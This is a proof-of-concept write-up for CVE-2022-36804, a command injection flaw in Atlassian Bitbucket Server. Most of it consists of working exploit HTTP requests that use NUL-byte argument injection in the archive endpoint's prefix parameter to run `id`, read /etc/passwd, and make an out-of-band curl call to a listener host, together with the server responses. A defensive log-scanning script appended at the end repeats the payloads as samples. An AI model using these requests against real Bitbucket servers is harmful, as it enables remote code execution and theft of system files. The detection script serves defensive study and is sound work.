Atlassian Bitbucket Server and Data Center - Command Injection Vulnerability (CVE-2022-36804)
In affected versions of Atlassian Bitbucket Server and Data Center a Command Injection Vulnerability exists in multiple API endpoints where an attacker with access to a public repository or with read permissions to a private Bitbucket repository can execute arbitrary code by sending a malicious HTTP request.
docker pull atlassian/bitbucket-server:7.2.5-ubuntu-jdk11
docker run -v /data/bitbucket:/var/atlassian/application-data/bitbucket --name="bitbucket" -d -p 7990:7990 -p 7999:7999 atlassian/bitbucket-server:7.2.5-ubuntu-jdk11
- Create a new project named CFX and a repository named lord, and make it public. You can use any name for the project and repository.
- URL to list public repositories:
curl http://127.0.0.1:7990/rest/api/latest/repos
REQUEST (the %00 bytes in the prefix parameter split it into extra git archive arguments, smuggling --remote and --exec=`id`; the command output is echoed back in the error message of the response)
GET /rest/api/latest/projects/cfx/repos/lord/archive?format=zip&path=bighax&prefix=fusion/%00--remote=/%00--exec=%60id%60%00--prefix=/ HTTP/1.1
Host: 127.0.0.1:7990
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 2
RESPONSE
HTTP/1.1 500
X-AREQUESTID: @1J1EWV1x490x54736x0
X-ASEN: SEN-L18735288
Cache-Control: no-cache, no-transform
Vary: accept-encoding,x-auserid,cookie,x-ausername,accept-encoding
Content-Type: application/json;charset=UTF-8
Date: Tue, 04 Oct 2022 08:10:56 GMT
Connection: close
Content-Length: 380
{"errors":[{"context":null,"message":"'/usr/bin/git archive --format=zip --prefix=fusion/\u0000--remote=/\u0000--exec=`id`\u0000--prefix=/ -- 49f16ce1e8ad32a360c9db7a3a84a0b72a12c51f bighax' exited with code 128 saying: `id` '/': 1: uid=2003(bitbucket): not found\nfatal: the remote end hung up unexpectedly","exceptionName":"com.atlassian.bitbucket.scm.CommandFailedException"}]}
- Reading /etc/passwd:
rest/api/latest/projects/cfx/repos/lord/archive?format=zip&path=bighax&prefix=fusion/%00--remote=/%00--exec=%60cat%20/etc/passwd%60%00--prefix=/
- OOB test: replace http://example.com with a Burp Collaborator URL or a netcat listener:
rest/api/latest/projects/cfx/repos/lord/archive?format=zip&path=bighax&prefix=qualys/%00--remote=/%00--exec=curl%20http://example.com%00--prefix=/
REQUEST (injecting --help makes git archive print its usage text, which comes back as the body of the 200 response; this confirms the argument injection without running a command)
GET /rest/api/latest/projects/cfx/repos/lord/archive?format=zip&prefix=/%00--help%00--%00 HTTP/1.1
Host: 127.0.0.1:7990
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 2
RESPONSE
HTTP/1.1 200
X-AREQUESTID: @1J1EWV1x506x54738x0
X-ASEN: SEN-L18735288
Cache-Control: no-cache, no-transform
Vary: X-AUSERNAME
Vary: X-AUSERID
Vary: Cookie
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="lord-master@49f16ce1e8a.zip"; filename*=UTF-8''lord-master%4049f16ce1e8a.zip
Content-Type: application/octet-stream
Content-Length: 875
Date: Tue, 04 Oct 2022 08:26:21 GMT
usage: git archive [<options>] <tree-ish> [<path>...]
or: git archive --list
or: git archive --remote <repo> [--exec <cmd>] [<options>] <tree-ish> [<path>...]
or: git archive --remote <repo> [--exec <cmd>] --list
--format <fmt> archive format
--prefix <prefix> prepend prefix to each pathname in the archive
-o, --output <file> write the archive to this file
--worktree-attributes
read .gitattributes in working directory
-v, --verbose report archived files on stderr
-0 store only
-1 compress faster
-9 compress better
-l, --list list supported archive formats
--remote <repo> retrieve the archive from remote repository <repo>
--exec <command> path to the remote git-upload-archive command
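As an added defender-side example (not part of this PoC), a small log-scanning script that flags requests to the archive endpoint whose query parameters contain NUL bytes splitting the value into extra git options, as in the requests above. The log lines are constructed samples, not a real Bitbucket access log; the line layout (method, target, status) and the regex for the archive path are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample request lines (method, target, status); not taken from a real
# Bitbucket access log. Lines 1 and 2 carry the NUL-byte option injection shown on
# this page, lines 3 and 4 are benign archive/browse requests.
SAMPLE_LOG = """\
GET /rest/api/latest/projects/cfx/repos/lord/archive?format=zip&path=bighax&prefix=fusion/%00--remote=/%00--exec=%60id%60%00--prefix=/ 500
GET /rest/api/latest/projects/cfx/repos/lord/archive?format=zip&prefix=/%00--help%00--%00 200
GET /rest/api/latest/projects/cfx/repos/lord/archive?format=zip&prefix=release-1.0/ 200
GET /rest/api/latest/projects/cfx/repos/lord/browse 200
"""

# Assumed shape of the vulnerable endpoint's path (API version, project key, repo slug).
ARCHIVE_PATH = re.compile(r"^/rest/api/[^/]+/projects/[^/]+/repos/[^/]+/archive/?$")
# Options whose presence turns a smuggled argument list into remote command execution.
RCE_OPTIONS = ("--remote", "--exec")


def analyze_request(target):
    """Return one finding per query parameter that smuggles extra git arguments via NUL bytes."""
    url = urlsplit(target)
    if not ARCHIVE_PATH.match(url.path):
        return []
    findings = []
    for name, value in parse_qsl(url.query, keep_blank_values=True):  # %00 decodes to "\x00"
        if "\x00" not in value:
            continue
        pieces = [p for p in value.split("\x00") if p]            # what git would see as argv
        injected = [p for p in pieces[1:] if p.startswith("-")]   # everything after the first NUL
        findings.append({
            "param": name,
            "injected": injected,
            "rce": any(o.split("=", 1)[0] in RCE_OPTIONS for o in injected),
        })
    return findings


def scan_log(text):
    """Map 1-based line numbers of suspicious requests to their findings."""
    hits = {}
    for lineno, line in enumerate(text.splitlines(), start=1):
        parts = line.split()
        if len(parts) >= 2 and (findings := analyze_request(parts[1])):
            hits[lineno] = findings
    return hits


if __name__ == "__main__":
    for lineno, findings in scan_log(SAMPLE_LOG).items():
        print(lineno, findings)
```

A request flagged with "rce": True deserves immediate triage; a "--help" style probe with "rce": False still indicates someone testing the endpoint for this bug.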